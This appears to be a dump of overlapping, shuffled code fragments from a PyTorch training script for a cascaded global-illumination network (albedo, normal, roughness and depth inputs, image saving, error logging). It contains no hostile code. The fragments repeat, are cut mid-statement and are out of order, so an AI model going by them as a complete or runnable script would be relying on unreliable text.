"(0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment,",
"import torch.optim as optim import argparse import random import os import models import",
"import Variable import torch.optim as optim import argparse import random import os import",
"-1, help='the training epoch of the network') # The detail network setting parser.add_argument('--cascadeLevel',",
"you should probably run with --cuda\") #################################### # initalize tensors albedoBatch = Variable(torch.FloatTensor(opt.batchSize,",
"normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) roughBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize)",
"globalIllu3 = globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs = [] globalIllu3Errs = [] pixelNum",
"( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data , '{0}/{1}_imP2.png'.format(opt.experiment, j) ) vutils.save_image( ( (",
"the input vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(normalBatch +",
") if opt.experiment is None: opt.experiment = 'check_globalillumination' os.system('mkdir {0}'.format(opt.experiment) ) os.system('cp *.py",
"0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) ) trainingLog.close() # Update the",
"opt.epochId) ) ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) ) ############## ###################### # Send things into",
"into GPU if opt.cuda: albedoBatch = albedoBatch.cuda(opt.gpuId) normalBatch = normalBatch.cuda(opt.gpuId) roughBatch = roughBatch.cuda(opt.gpuId)",
"pixelNum / 3.0 ) globalIllu2ErrSum = sum(globalIllu2Errs) globalIllu3ErrSum = sum(globalIllu3Errs) totalErr = g2W",
"[1, 1+opt.cascadeLevel], dtype = np.float32) renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32)",
") # Save the predicted results for n in range(0, opt.cascadeLevel + 1):",
") vutils.save_image( ( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) )",
"j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch,",
"j% 2000 == 0: # Save the ground truth and the input vutils.save_image(",
"( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) ) vutils.save_image( (",
"= Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) # Global illumination globIllu1to2 = models.globalIllumination() globIllu2to3",
"epoch of the network') # The detail network setting parser.add_argument('--cascadeLevel', type=int, default=0, help='how",
"= parser.parse_args() print(opt) assert(opt.cascadeLevel == 0 ) if opt.experiment is None: opt.experiment =",
"trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w') for i, dataBatch in enumerate(brdfLoader): j += 1",
"from torch.autograd import Variable import torch.optim as optim import argparse import random import",
"= [] globalIllu3s = [] n = 0 inputGlob2 = torch.cat([imP1Batch, albedoBatch, normalBatch,",
"the cascade network architecture # globalIllu2s = [] globalIllu3s = [] n =",
"= depthBatch.cuda(opt.gpuId) segBatch = segBatch.cuda(opt.gpuId) imP1Batch = imP1Batch.cuda(opt.gpuId) imP2Batch = imP2Batch.cuda(opt.gpuId) imP3Batch =",
"= torch.sum(segBatch ).cpu().data.item() for m in range(0, n + 1): globalIllu2Errs.append( torch.sum( (globalIllu2s[m]",
"j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j) utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j) utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog,",
"network') parser.add_argument('--cuda', action='store_true', help='enables cuda') parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the gpus used for",
"( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) ) vutils.save_image( ( (",
"action='store_true', help='enables cuda') parser.add_argument('--deviceIds', type=int, nargs='+', default=[0], help='the gpus used for training network')",
"globalIllu2Errs, trainingLog, epoch, j) utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j) globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList,",
"segBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) depthBatch = Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize)",
"2 == 0: for param_group in opGlobalIllu1to2.param_groups: param_group['lr'] /= 2 for param_group in",
"Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) # Global illumination globIllu1to2 = models.globalIllumination() globIllu2to3 =",
"i, dataBatch in enumerate(brdfLoader): j += 1 # Load data from cpu to",
"'{0}/{1}_normalGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch) ).data, '{0}/{1}_roughGt.png'.format(opt.experiment, j) ) depthOut =",
"* segBatch.expand_as(imP2Batch) ) / pixelNum / 3.0 ) globalIllu3Errs.append(torch.sum( (globalIllu3s[m] - imP3Batch) *",
"locationi of training set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images') parser.add_argument('--experiment', default=None, help='the path",
"axis=0), trainingLog, epoch, j) else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1,",
"= sum(globalIllu2Errs) globalIllu3ErrSum = sum(globalIllu3Errs) totalErr = g2W * globalIllu2ErrSum + g3W *",
"np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu',",
"1 # Load data from cpu to gpu albedo_cpu = dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu",
"width of the input image to network') parser.add_argument('--cuda', action='store_true', help='enables cuda') parser.add_argument('--deviceIds', type=int,",
"of cascades should we use') opt = parser.parse_args() print(opt) assert(opt.cascadeLevel == 0 )",
"j += 1 # Load data from cpu to gpu albedo_cpu = dataBatch['albedo']",
"j, n) ) trainingLog.close() # Update the training rate if (epoch + 1)",
"dataBatch['depth'] depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu ) imP1_cpu = dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu ) imP2_cpu = dataBatch['imP2']",
"torch.optim as optim import argparse import random import os import models import torchvision.utils",
"globalIllu2Errs, epoch, j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j) utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j) utils.writeErrToFile('globalIllu3',",
"utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu',",
"import numpy as np from torch.autograd import Variable import torch.optim as optim import",
").data , '{0}/{1}_imP2.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP3Batch + 1)*segBatch.expand_as(imP3Batch))**(1.0/2.2) ).data ,",
"utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch,",
"truth and the input vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j) ) vutils.save_image(",
"0 globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel],",
"opt.imageSize) ) # Global illumination globIllu1to2 = models.globalIllumination() globIllu2to3 = models.globalIllumination() ######################################### if",
"g2W, g3W = opt.globalIllu2, opt.globalIllu3 opt.gpuId = opt.deviceIds[0] opt.seed = random.randint(1, 10000) print(\"Random",
"dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize) brdfLoader = DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers = 8,",
"opGlobalIllu2to3.zero_grad() ######################################################## # Build the cascade network architecture # globalIllu2s = [] globalIllu3s",
"imP3Batch) * segBatch.expand_as(imP3Batch) ) / pixelNum / 3.0 ) globalIllu2ErrSum = sum(globalIllu2Errs) globalIllu3ErrSum",
"10000) print(\"Random Seed: \", opt.seed) random.seed(opt.seed) torch.manual_seed(opt.seed) if torch.cuda.is_available() and not opt.cuda: print(\"WARNING:",
"1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) ) vutils.save_image( ( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch)",
"torch import numpy as np from torch.autograd import Variable import torch.optim as optim",
"device, so you should probably run with --cuda\") #################################### # initalize tensors albedoBatch",
"= dataBatch['albedo'] albedoBatch.data.resize_(albedo_cpu.shape) albedoBatch.data.copy_(albedo_cpu ) normal_cpu = dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu ) rough_cpu =",
"(globalIllu2s[m] - imP2Batch) * (globalIllu2s[m] - imP2Batch) * segBatch.expand_as(imP2Batch) ) / pixelNum /",
"torch.cuda.is_available() and not opt.cuda: print(\"WARNING: You have a CUDA device, so you should",
"globalIllu3ErrSum = sum(globalIllu3Errs) totalErr = g2W * globalIllu2ErrSum + g3W * globalIllu3ErrSum totalErr.backward()",
"/ 3.0 ) globalIllu2ErrSum = sum(globalIllu2Errs) globalIllu3ErrSum = sum(globalIllu3Errs) totalErr = g2W *",
"(globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch) ) / pixelNum / 3.0 ) globalIllu2ErrSum =",
":], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) else:",
"'{0}/{1}_roughGt.png'.format(opt.experiment, j) ) depthOut = 1 / torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch) depthOut",
"epochs for training') parser.add_argument('--batchSize', type=int, default=16, help='input batch size') parser.add_argument('--imageSize', type=int, default=256, help='the",
"= imP1Batch.cuda(opt.gpuId) imP2Batch = imP2Batch.cuda(opt.gpuId) imP3Batch = imP3Batch.cuda(opt.gpuId) globIllu1to2 = globIllu1to2.cuda(opt.gpuId) globIllu2to3 =",
"lr=2e-4, betas=(0.5, 0.999) ) ##################################### #################################### brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize) brdfLoader",
":], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1,",
"vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2)",
"j) ) vutils.save_image( ( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data , '{0}/{1}_imP2.png'.format(opt.experiment, j) )",
"parser.add_argument('--imageSize', type=int, default=256, help='the height / width of the input image to network')",
"3, opt.imageSize, opt.imageSize) ) normalBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) roughBatch =",
"= dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu ) imP2_cpu = dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu ) imP3_cpu =",
"j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0),",
"{0}'.format(opt.experiment) ) os.system('cp *.py %s' % opt.experiment ) g2W, g3W = opt.globalIllu2, opt.globalIllu3",
"= optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) ) ##################################### #################################### brdfDataset = dataLoader.BatchLoader(opt.dataRoot, imSize =",
"of training set parser.add_argument('--dataRoot', default='/home/zhl/SiggraphAsia18/Data/train/', help='path to images') parser.add_argument('--experiment', default=None, help='the path to",
") vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data, '{0}/{1}_normalGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(roughBatch + 1)*segBatch.expand_as(roughBatch)",
"opt.cascadeLevel + 1): vutils.save_image( ( ( 0.5*(globalIllu2s[n] + 1)*segBatch.expand_as(imP2Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j,",
"np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu',",
"= 'store_true', help='whether to fine-tune the network or not') parser.add_argument('--epochId', type=int, default =",
"random.seed(opt.seed) torch.manual_seed(opt.seed) if torch.cuda.is_available() and not opt.cuda: print(\"WARNING: You have a CUDA device,",
"# The detail network setting parser.add_argument('--cascadeLevel', type=int, default=0, help='how much level of cascades",
"type=int, nargs='+', default=[0], help='the gpus used for training network') # The training weight",
"j = 0 globalIllu1ErrsNpList= np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu2ErrsNpList = np.ones(",
"totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step() # Output training error utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs,",
"imP3Batch) * (globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch) ) / pixelNum / 3.0 )",
"opt.cuda: print(\"WARNING: You have a CUDA device, so you should probably run with",
"= dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu ) seg_cpu = dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu ) depth_cpu =",
"epoch, j) utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j) globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0)",
"2000 == 0: # Save the ground truth and the input vutils.save_image( (0.5*(albedoBatch",
"np.float32) globalIllu2ErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) globalIllu3ErrsNpList= np.ones( [1, 1+opt.cascadeLevel],",
"parser.add_argument('--isFineTune', action = 'store_true', help='whether to fine-tune the network or not') parser.add_argument('--epochId', type=int,",
"cascades should we use') opt = parser.parse_args() print(opt) assert(opt.cascadeLevel == 0 ) if",
"axis=0), trainingLog, epoch, j) if j == 1 or j == 1000 or",
"= -1, help='the training epoch of the network') # The detail network setting",
"torch.manual_seed(opt.seed) if torch.cuda.is_available() and not opt.cuda: print(\"WARNING: You have a CUDA device, so",
"'w') for i, dataBatch in enumerate(brdfLoader): j += 1 # Load data from",
"= [] n = 0 inputGlob2 = torch.cat([imP1Batch, albedoBatch, normalBatch, roughBatch, depthBatch, segBatch],",
").data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) ) trainingLog.close() # Update the training rate if (epoch",
"normal_cpu = dataBatch['normal'] normalBatch.data.resize_(normal_cpu.shape) normalBatch.data.copy_(normal_cpu ) rough_cpu = dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu ) seg_cpu",
"depthBatch.data.resize_(depth_cpu.shape) depthBatch.data.copy_(depth_cpu ) imP1_cpu = dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu ) imP2_cpu = dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape)",
"== 1000 or j% 2000 == 0: # Save the ground truth and",
"open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w') for i, dataBatch in enumerate(brdfLoader): j += 1 # Load",
") np.save('{0}/globalIllu3_{1}.npy'.format(opt.experiment, epoch), globalIllu3ErrsNpList ) torch.save(globIllu1to2.state_dict(), '{0}/globIllu1to2_{1}.pth'.format(opt.experiment, epoch) ) torch.save(globIllu2to3.state_dict(), '{0}/globIllu2to3_{1}.pth'.format(opt.experiment, epoch) )",
"1+opt.cascadeLevel], dtype = np.float32) renderedErrsNpList = np.ones( [1, 1+opt.cascadeLevel], dtype = np.float32) for",
"globalIllu3Errs, epoch, j) utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j) utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j)",
"architecture # globalIllu2s = [] globalIllu3s = [] n = 0 inputGlob2 =",
"g2W * globalIllu2ErrSum + g3W * globalIllu3ErrSum totalErr.backward() opGlobalIllu1to2.step() opGlobalIllu2to3.step() # Output training",
") g2W, g3W = opt.globalIllu2, opt.globalIllu3 opt.gpuId = opt.deviceIds[0] opt.seed = random.randint(1, 10000)",
"= imP3Batch.cuda(opt.gpuId) globIllu1to2 = globIllu1to2.cuda(opt.gpuId) globIllu2to3 = globIllu2to3.cuda(opt.gpuId) #################################### #################################### # Global Optimier",
"of global illumination prediction 2') parser.add_argument('--globalIllu3', type=float, default=1, help='the weight of global illumination",
"Fine Tune the network parser.add_argument('--isFineTune', action = 'store_true', help='whether to fine-tune the network",
") opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ######################################################## # Build the cascade network architecture # globalIllu2s =",
"'{0}/{1}_imP2Pred_{2}.png'.format(opt.experiment, j, n) ) vutils.save_image( ( ( 0.5*(globalIllu3s[n] + 1)*segBatch.expand_as(imP3Batch) )**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment,",
"default=256, help='the height / width of the input image to network') parser.add_argument('--cuda', action='store_true',",
"batch size') parser.add_argument('--imageSize', type=int, default=256, help='the height / width of the input image",
"= Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )",
"* (globalIllu3s[m] - imP3Batch) * segBatch.expand_as(imP3Batch) ) / pixelNum / 3.0 ) globalIllu2ErrSum",
"imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) # Global illumination globIllu1to2 = models.globalIllumination()",
"< 1000: utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), epoch,",
"normalBatch.data.copy_(normal_cpu ) rough_cpu = dataBatch['rough'] roughBatch.data.resize_(rough_cpu.shape) roughBatch.data.copy_(rough_cpu ) seg_cpu = dataBatch['seg'] segBatch.data.resize_(seg_cpu.shape) segBatch.data.copy_(seg_cpu",
"dim=1) globalIllu2 = globIllu1to2(inputGlob2) globalIllu2s.append(globalIllu2 ) inputGlob3 = torch.cat([globalIllu2s[n], albedoBatch, normalBatch, roughBatch, depthBatch,",
"dataBatch['imP1'] imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu ) imP2_cpu = dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu ) imP3_cpu = dataBatch['imP3']",
"help='the weight of global illumination prediction 3') # Fine Tune the network parser.add_argument('--isFineTune',",
"opGlobalIllu1to2.param_groups: param_group['lr'] /= 2 for param_group in opGlobalIllu2to3.param_groups: param_group['lr'] /= 2 np.save('{0}/globalIllu2_{1}.npy'.format(opt.experiment, epoch),",
").data , '{0}/{1}_imP1.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP2Batch + 1)*segBatch.expand_as(imP2Batch))**(1.0/2.2) ).data ,",
"if j < 1000: utils.writeNpErrToScreen('globalIllu2_Accu:', np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :],",
"segBatch], dim=1) globalIllu3 = globIllu2to3(inputGlob3.detach() ) globalIllu3s.append(globalIllu3) ######################################################## globalIllu2Errs = [] globalIllu3Errs =",
"weight of global illumination prediction 2') parser.add_argument('--globalIllu3', type=float, default=1, help='the weight of global",
"j) utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j) globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList",
"axis=0), epoch, j) utils.writeNpErrToFile('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :],",
"opt.imageSize) ) imP3Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) # Global illumination globIllu1to2",
"= dataLoader.BatchLoader(opt.dataRoot, imSize = opt.imageSize) brdfLoader = DataLoader(brdfDataset, batch_size = opt.batchSize, num_workers =",
"epoch, j) utils.writeErrToFile('globalIllu2', globalIllu2Errs, trainingLog, epoch, j) utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j) globalIllu2ErrsNpList",
"= Variable(torch.FloatTensor(opt.batchSize, 1, opt.imageSize, opt.imageSize) ) imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) )",
"'{0}/{1}_depthGt.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data , '{0}/{1}_imP1.png'.format(opt.experiment, j)",
"should we use') opt = parser.parse_args() print(opt) assert(opt.cascadeLevel == 0 ) if opt.experiment",
"import argparse import random import os import models import torchvision.utils as vutils import",
"default=1, help='the weight of global illumination prediction 3') # Fine Tune the network",
"vutils.save_image( (0.5*(albedoBatch + 1)*segBatch.expand_as(albedoBatch) ).data, '{0}/{1}_albedoGt.png'.format(opt.experiment, j) ) vutils.save_image( (0.5*(normalBatch + 1)*segBatch.expand_as(normalBatch) ).data,",
"cascade network architecture # globalIllu2s = [] globalIllu3s = [] n = 0",
"parser.add_argument('--globalIllu2', type=float, default=1, help='the weight of global illumination prediction 2') parser.add_argument('--globalIllu3', type=float, default=1,",
"normalBatch.cuda(opt.gpuId) roughBatch = roughBatch.cuda(opt.gpuId) depthBatch = depthBatch.cuda(opt.gpuId) segBatch = segBatch.cuda(opt.gpuId) imP1Batch = imP1Batch.cuda(opt.gpuId)",
"global illumination prediction 3') # Fine Tune the network parser.add_argument('--isFineTune', action = 'store_true',",
"training') parser.add_argument('--batchSize', type=int, default=16, help='input batch size') parser.add_argument('--imageSize', type=int, default=256, help='the height /",
"Output training error utils.writeErrToScreen('globalIllu2', globalIllu2Errs, epoch, j) utils.writeErrToScreen('globalIllu3', globalIllu3Errs, epoch, j) utils.writeErrToFile('globalIllu2', globalIllu2Errs,",
"( depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP1Batch + 1)*segBatch.expand_as(imP1Batch))**(1.0/2.2) ).data",
"# Build the cascade network architecture # globalIllu2s = [] globalIllu3s = []",
"for param_group in opGlobalIllu1to2.param_groups: param_group['lr'] /= 2 for param_group in opGlobalIllu2to3.param_groups: param_group['lr'] /=",
"opt.isFineTune: globIllu1to2.load_state_dict(torch.load('{0}/globIllu1to2_{1}.pth'.format(opt.experiment, opt.epochId) ) ) globIllu2to3.load_state_dict(torch.load('{0}/globIllu2to3_{1}.pth'.format(opt.experiment, opt.epochId) ) ) ############## ###################### # Send",
"imP1Batch.data.resize_(imP1_cpu.shape) imP1Batch.data.copy_(imP1_cpu ) imP2_cpu = dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu ) imP3_cpu = dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape)",
"utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j) globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList =",
"type=float, default=1, help='the weight of global illumination prediction 2') parser.add_argument('--globalIllu3', type=float, default=1, help='the",
"probably run with --cuda\") #################################### # initalize tensors albedoBatch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize,",
"epoch, j) else: utils.writeNpErrToScreen('globalIllu2_Accu', np.mean(globalIllu2ErrsNpList[j-999:j+1, :], axis=0), epoch, j) utils.writeNpErrToScreen('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[j-999:j+1, :], axis=0),",
"dataBatch['imP2'] imP2Batch.data.resize_(imP2_cpu.shape) imP2Batch.data.copy_(imP2_cpu ) imP3_cpu = dataBatch['imP3'] imP3Batch.data.resize_(imP3_cpu.shape) imP3Batch.data.copy_(imP3_cpu ) opGlobalIllu1to2.zero_grad() opGlobalIllu2to3.zero_grad() ########################################################",
") depthOut = 1 / torch.clamp(depthBatch, 1e-6, 10) * segBatch.expand_as(depthBatch) depthOut = (depthOut",
"Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP3Batch",
"default = -1, help='the training epoch of the network') # The detail network",
"opt.imageSize) ) imP1Batch = Variable(torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize) ) imP2Batch = Variable(torch.FloatTensor(opt.batchSize, 3,",
"= normalBatch.cuda(opt.gpuId) roughBatch = roughBatch.cuda(opt.gpuId) depthBatch = depthBatch.cuda(opt.gpuId) segBatch = segBatch.cuda(opt.gpuId) imP1Batch =",
"in enumerate(brdfLoader): j += 1 # Load data from cpu to gpu albedo_cpu",
"trainingLog, epoch, j) utils.writeErrToFile('globalIllu3', globalIllu3Errs, trainingLog, epoch, j) globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)],",
") globalIllu2ErrSum = sum(globalIllu2Errs) globalIllu3ErrSum = sum(globalIllu3Errs) totalErr = g2W * globalIllu2ErrSum +",
"j) globalIllu2ErrsNpList = np.concatenate( [globalIllu2ErrsNpList, utils.turnErrorIntoNumpy(globalIllu2Errs)], axis=0) globalIllu3ErrsNpList = np.concatenate( [globalIllu3ErrsNpList, utils.turnErrorIntoNumpy(globalIllu3Errs)], axis=0)",
")**(1.0/2.2) ).data, '{0}/{1}_imP3Pred_{2}.png'.format(opt.experiment, j, n) ) trainingLog.close() # Update the training rate if",
", '{0}/{1}_imP3.png'.format(opt.experiment, j) ) # Save the predicted results for n in range(0,",
"/0.8 vutils.save_image( ( depthOut*segBatch.expand_as(depthBatch) ).data, '{0}/{1}_depthGt.png'.format(opt.experiment, j) ) vutils.save_image( ( ( 0.5*(imP1Batch +",
"0.999) ) opGlobalIllu2to3 = optim.Adam(globIllu2to3.parameters(), lr=2e-4, betas=(0.5, 0.999) ) ##################################### #################################### brdfDataset =",
"opt.globalIllu2, opt.globalIllu3 opt.gpuId = opt.deviceIds[0] opt.seed = random.randint(1, 10000) print(\"Random Seed: \", opt.seed)",
"np.mean(globalIllu2ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j) utils.writeNpErrToFile('globalIllu3_Accu', np.mean(globalIllu3ErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)",
"if j == 1 or j == 1000 or j% 2000 == 0:",
"torchvision.utils as vutils import utils import dataLoader from torch.utils.data import DataLoader parser =",
